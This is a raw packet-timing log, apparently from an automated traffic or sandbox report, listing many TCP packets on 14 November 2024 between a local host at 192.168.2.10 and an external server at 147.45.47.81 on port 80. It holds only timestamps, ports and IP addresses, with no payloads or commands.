                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615823030 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615833044 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615833998 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615878105 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615878105 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.623265028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.623275995 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.623286009 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.623296022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.623306036 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.623328924 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.623339891 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.623713970 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.623713970 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.624094009 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.624104977 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.624115944 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.624684095 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.627342939 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629429102 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629441023 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629452944 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629462957 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629518986 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629529953 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629539967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629551888 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629599094 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629616022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629626989 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629636049 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629646063 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629657030 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629802942 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629813910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629832029 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629868031 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629878044 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629890919 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629930019 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629940033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629951000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629966021 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.629976988 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630036116 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630048990 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630134106 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630145073 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630312920 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630331993 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630341053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630378008 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630388021 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630443096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630453110 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630568027 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630578041 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630588055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630671978 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630680084 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630688906 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630701065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630738020 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630738020 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630738020 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630738020 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630738020 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630738974 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630738974 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630796909 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630796909 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630796909 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630796909 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630796909 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630796909 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630796909 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630796909 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630812883 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630815983 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630815983 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630825043 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630835056 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630851030 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630861998 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630872011 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630883932 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630894899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630916119 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630937099 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630949020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630959034 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.630970955 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631041050 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631278992 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631289959 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631302118 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631316900 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631335020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631345987 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631350994 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631350994 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631350994 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631350994 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631350994 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631350994 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631350994 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631361961 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631373882 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631382942 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631382942 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631382942 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631387949 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631398916 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631441116 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631449938 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631458998 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631469965 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631480932 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631484032 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631484032 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631484032 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631494999 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631504059 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631515026 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631525993 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631623983 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631634951 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631644964 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631673098 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631684065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631696939 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631712914 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631722927 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631733894 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631743908 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631767988 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631778955 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631788015 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631807089 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631818056 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631828070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631839037 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631853104 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631864071 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631870031 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631875038 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631941080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.631951094 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632076979 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632086039 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632199049 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632210016 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632220030 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632276058 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632276058 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632276058 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632276058 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632276058 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632276058 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632276058 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632276058 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632292032 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632303953 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632303953 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632303953 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632303953 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632303953 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632303953 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632303953 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632303953 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632320881 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632333994 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632338047 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632345915 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632356882 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632368088 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632405043 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632421017 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632431984 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632565022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632575989 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632586956 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632599115 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632610083 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632620096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632638931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632651091 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632662058 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632672071 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632683992 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632699966 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632718086 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632729053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.632739067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.635344028 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.635344028 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.635344028 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.635344028 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.635344028 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.635344028 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.635344028 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.635384083 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.635384083 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.635384083 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.635384083 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.639347076 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651078939 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651089907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651099920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651124954 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651135921 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651144981 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651154995 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651165962 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651175022 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651623011 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651633978 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651643991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651648998 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651655912 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.651668072 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.653493881 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.685487032 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.700788975 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.700808048 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.700819969 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701338053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701349020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701359987 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701365948 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701392889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701404095 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701415062 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701426029 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701574087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701584101 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701595068 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701967001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701967001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701967001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701967001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701967001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.701967001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.707356930 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.707379103 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.707391977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.707402945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.707413912 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.707426071 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.707437038 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.707447052 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.707473993 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.707598925 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731523037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731535912 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731657982 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731673956 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731686115 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731688023 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731695890 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731708050 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731719971 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731729984 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731748104 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731758118 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731880903 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731892109 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731901884 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731905937 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731925011 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731952906 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731971025 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731981993 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.731993914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732004881 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732016087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732026100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732026100 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732038021 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732064009 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732064009 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732130051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.732140064 CET8049958147.45.47.81192.168.2.10
